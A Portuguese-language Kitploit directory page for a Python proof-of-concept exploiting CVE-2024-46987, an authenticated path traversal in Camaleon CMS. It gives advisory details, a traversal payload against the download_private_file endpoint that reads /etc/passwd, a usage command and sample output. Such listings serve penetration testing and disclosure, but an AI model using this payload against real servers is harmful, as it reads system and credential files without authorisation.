Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-46987 — Exploit criado usando Python | Kitploit
Ferramentas/GitHubGitHub/advaitpathak21/cve-2024-46987
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoAprendizado e Educação
GitHubadvaitpathak21/cve-2024-46987

CVE-2024-46987

Exploit criado usando Python

Ver Repositório
1há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-46987 – Camaleon CMS Path Traversal Autenticado / Leitura Arbitrária de Arquivos

CVSS 7.7 High Python PoC

A vulnerabilidade CVE-2024-46987 é uma vulnerabilidade de path traversal autenticada (CWE-22) no Camaleon CMS (um sistema de gerenciamento de conteúdo baseado em Ruby on Rails). Ela permite que um usuário logado (mesmo com privilégios baixos) leia arquivos arbitrários no servidor por meio da ação MediaController#download_private_file.

  • Publicado em: 18 de setembro de 2024
  • CVSS v3.1: 7.7 Alta
    Vetor: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
  • CWE: CWE-22 (Limitação inadequada de um nome de caminho a um diretório restrito), CWE-200 (Exposição de informações confidenciais)
  • Versões afetadas: Camaleon CMS ≤ 2.8.0 (alguns relatórios indicam que também funciona na 2.9.0)
  • Corrigido em: ≥ 2.8.2 (recomendado: atualize para a versão mais recente 2.8.x ou 2.9.x)
  • Avisos:
    • GitHub Advisory GHSA-cp65-5m9r-vc2c
    • NVD CVE-2024-46987
    • GitHub Security Lab GHSL-2024-183

Visão Geral da Vulnerabilidade

Um atacante com credenciais válidas pode enviar uma solicitação maliciosa para: /admin/media/download_private_file?file=../../../../etc/passwd

Instalando os Requisitos

  • pip install -r requirements.txt

OU

  • pip install -r requests fire

Uso

  • Primeiro, crie um novo usuário
root@kitploit:~
python cms-exploit.py \
  --url http://target.local \
  --username neal \
  --password 'Caffery@123' \
  --cmd /etc/passwd
  • Exemplo de saída:
root@kitploit:~
[+] Login successful
[*] Requesting: http://target.local/admin/media/download_private_file?file=../../../etc/passwd
[+] Success – content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
.
.

Nota: O script assume um formulário de login no estilo Rails (user[email], user[password], authenticity_token). Ajuste os campos do payload se o seu alvo usar nomes personalizados.

Aviso Legal e Ético

Esta ferramenta é fornecida apenas para fins educacionais e de testes de segurança autorizados.

Use apenas em sistemas que você possui ou para os quais tem permissão explícita por escrito para testar (ex.: programas de bug bounty, pentests internos, laboratórios como HTB). O uso não autorizado pode violar leis. O autor não é responsável pelo uso indevido.

Baixar ferramenta